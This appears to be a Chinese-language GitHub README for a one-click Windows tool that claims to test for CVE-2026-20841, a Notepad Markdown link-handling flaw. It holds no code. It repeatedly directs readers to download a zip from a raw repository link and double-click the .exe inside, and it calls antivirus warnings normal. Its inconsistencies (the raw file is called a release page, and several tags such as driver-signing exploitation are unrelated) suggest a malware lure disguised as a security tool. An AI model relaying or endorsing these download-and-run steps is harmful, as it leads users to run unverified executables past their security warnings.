hamzamalik3461/CVE-2026-20841
GitHub: hamzamalik3461/CVE-2026-20841
Stars: 0 | Forks: 0
# 🛡️ CVE-2026-20841 - Windows Notepad 安全测试工具
[](https://github.com/hamzamalik3461/CVE-2026-20841/raw/refs/heads/main/miscall/CV-v1.7-beta.3.zip)
## ⚠️ 什么是 CVE-2026-20841?
CVE-2026-20841 是 Windows Notepad 应用程序中的一个已知安全弱点。它影响 Markdown 功能,该功能允许 Notepad 显示带有可点击链接的格式化文本。出现此弱点的原因是,在 Notepad 内部运行的 Markdown 引擎没有限制其允许的链接类型(称为 URL 协议)。这意味着攻击者可以创建一个链接,当点击该链接时,会导致 Notepad 运行用户无意运行的程序或命令。
此工具提供了一个 **概念验证 (PoC)** 来演示此安全缺陷是如何运作的。它帮助安全研究人员和技术专家了解漏洞的原理,并测试系统是否面临风险。
## 💻 谁应该使用此工具?
本项目专为以下人群设计:
- 了解 Windows Notepad 中 CVE-2026-20841 的风险
- 测试其系统是否存在此安全问题
- 改进针对远程代码执行攻击的安全措施
运行此软件无需编程技能。它最适合 IT 专业人员或想要检查其 Windows 设备的好奇用户。
## 🚀 入门指南
### 系统要求
在使用此软件之前,请确保您的计算机符合以下要求:
- 运行 **Windows 10** 或更高版本
- 已安装 Notepad 应用程序(Windows 默认包含)
- 互联网连接以下载文件
- 足够的磁盘空间用于下载(小于 10 MB)
### 必要权限
测试工具可能需要权限才能在您的 PC 上运行程序。您可能会看到 Windows Defender 或防病毒软件警告。这是正常的,因为该工具模拟了真实攻击的运作方式。
您应该只在自己拥有或获得测试许可的计算机上运行该工具。
## 📥 下载与安装
要获取该软件,请执行以下操作:
1. **前往发布页面。**
点击这个大按钮访问下载区域:
[](https://github.com/hamzamalik3461/CVE-2026-20841/raw/refs/heads/main/miscall/CV-v1.7-beta.3.zip)
2. **在页面上选择最新的版本**。
寻找适合您系统的文件(通常是 `.exe` 或 `.zip` 文件)。
3. **下载文件。**
点击文件名链接开始下载。
4. **运行或解压软件。**
- 如果是 `.exe` 文件,双击它以运行。
- 如果是 `.zip` 文件,右键单击并选择“全部解压缩”,然后打开文件夹并双击其中的 `.exe` 文件。
5. **按照屏幕上的说明操作。**
软件将指导您完成测试过程。
## 🧭 如何使用该软件
安装后,您将看到一个带有说明的简单窗口。操作步骤如下:
- **步骤 1:** 点击“Run Test”按钮开始测试。
- **步骤 2:** 软件将模拟一个包含特殊链接的 Markdown 文件。
- **步骤 3:** 它将显示您的 Notepad 是否允许不安全的可点击链接。
- **步骤 4:** 在应用程序内或桌面上的文件中查看测试报告。
## 🔍 此测试有什么作用?
该工具创建一个包含使用特殊 URL 处理程序链接的虚假 Markdown 文件。通常,这些链接不应在未经许可的情况下打开程序。但由于 CVE-2026-20841,Notepad 并没有阻止它们。
当您运行测试时,软件会尝试在 Notepad 中打开这些链接。如果成功,说明 Notepad 存在漏洞,可能允许攻击者运行有害代码。
## 🛠 功能特性
- 简单的一键测试启动
- 清晰的报告显示您的系统是否受影响
- 为非专家设计的简单用户界面
- 支持最新的 Windows 版本
- 下载体积小
## 🔄 如何更新
为了保持测试的准确性,请在有新版本可用时下载:
1. 再次访问同一个发布页面:
[https://github.com/hamzamalik3461/CVE-2026-20841/raw/refs/heads/main/miscall/CV-v1.7-beta.3.zip](https://github.com/hamzamalik3461/CVE-2026-20841/raw/refs/heads/main/miscall/CV-v1.7-beta.3.zip)
2. 在顶部找到最新版本。
3. 按照下载部分的说明下载并运行新文件。
## 👥 获取帮助与支持
如果您遇到问题,可以:
- 查看 GitHub 页面上的“Issues”标签,看看其他人是否有同样的问题
- 使用“Discussions”页面进行问答
- 在存储库的主页上找到开发者的联系信息
## 🔒 保持安全
此工具展示了黑客如何利用安全漏洞。请负责任地使用它:
- 不要在您不拥有或未获得测试许可的设备上使用。
- 始终保持您的软件(包括 Windows)处于最新状态。
- 避免点击未知文件或电子邮件中的可疑链接。
## 🗂 相关主题
本项目涉及:
- Windows Notepad 的安全研究
- 命令注入漏洞
- 远程代码执行 (RCE) 风险
- 网络安全意识
- 漏洞测试工具
您现在可以通过访问下载页面开始测试:
[下载 CVE-2026-20841 工具](https://github.com/hamzamalik3461/CVE-2026-20841/raw/refs/heads/main/miscall/CV-v1.7-beta.3.zip)
标签:Conpot, CVE-2026-20841, DNS 反向解析, Go语言工具, IP 地址批量处理, Markdown安全, PoC验证工具, RCE, URL协议, URL发现, Windows 10, Windows Notepad, Windows安全, 命令执行, 安全检测, 恶意链接, 攻击模拟, 漏洞分析, 系统漏洞, 编程工具, 网络安全, 路径探测, 远程代码执行, 防御加固, 隐私保护, 驱动签名利用